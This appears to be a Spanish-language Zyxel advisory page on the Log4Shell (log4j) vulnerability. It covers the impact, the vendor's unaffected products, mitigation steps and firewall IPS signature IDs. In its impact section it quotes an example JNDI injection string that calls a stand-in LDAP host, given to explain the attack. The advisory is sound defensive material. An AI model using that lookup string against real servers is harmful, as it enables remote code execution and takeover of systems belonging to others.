Your browser either does not support JavaScript or you have turned JavaScript off.

Sala de prensa

Protéjase contra Log4Shell (log4j)

Descubra como los firewalls de Zyxel pueden protegerle y detector la nueva vulnerabilidad log4j.

Vulnerable log4j Package

Log4j es un proyecto open-source que se utiliza habitualmente para iniciar sesión en JAVA. Log4j descubrió una inyección de código remoto entre las versiones 2.x.x y 2.14.x (Igualmente, se ha encontrado un nuevo exploit en la versión 2.15 para log4j, CVE-2021-45046, por lo que recomendamos actualizar a la versión 2.17). Esta vulnerabilidad permite a los atacantes enviar un comando con formato especial para obtener la protección remota (Log4shell) fácilmente.

Impacto

La nueva vulnerabilidad cuenta con la puntuación más alta (10) en CVSS ya que el paquete log4j se usa ampliamente y puede ejecutarse de forma remota. Si el servidor es vulnerable, los atacantes pueden enviar comandos (como ${jndi:ldap:// example.com/a}) a log4j y conseguir hacerse con el servidor. A medida que el host se ve comprometido, este puede usarse como un bot, un miner o encriptar sus archivos importantes a través de ransomware.

¿Están afectados los dispositivos de seguridad de Zyxel?

Zyxel es consciente de las vulnerabilidades de ejecución remota de código (RCE) en Apache Log4j y confirma que todos sus productos de seguridad NO se ven afectados [1]. La serie de firewalls de Zyxel ATP/USG FLEX proporciona protección de múltiples capas para ayudarle contra este ataque.

Mitigar

En host: se recomienda actualizar a la última versión de Apache Log4j (>=2.17.0).

En la red:

Para reducir la superficie de ataque, no publique las aplicaciones vulnerables en Internet a menos que sea absolutamente necesario y aproveche la tecnología VPN para el acceso remoto a las aplicaciones.

Actualice a la última versión de firma IPS y luego habilite la función IPS para proteger su host. Si su host utiliza transmisión SSL/TLS, también debe habilitar la inspección SSL para una mayor detección. Cuando el ataque llega desde una dirección IP maliciosa, la función de reputación de IP le defiende contra el ataque desde la dirección IP.

Habilite los filtros DNS, URL, Content, el AntiVirus y Sandbox a fin de romper toda la cadena de ataque y así evitar una mayor infección.

Descubra más sobre Zyxel Security

Por favor, consulte la información sobre firma

Serie ATP/USGFLEX:

v4.0.x.20211217.0

#Firma ID 131026, 131027 y 131028 se usan para CVE-2021-44228.

#Firma ID 131029 y 131030 se usan para CVE-2021-45046.

Más información

Referencias

[1] Zyxel security advisory para vulnerabilidades Apache Log4j RCE

Si tiene alguna pregunta ventas@zyxel.es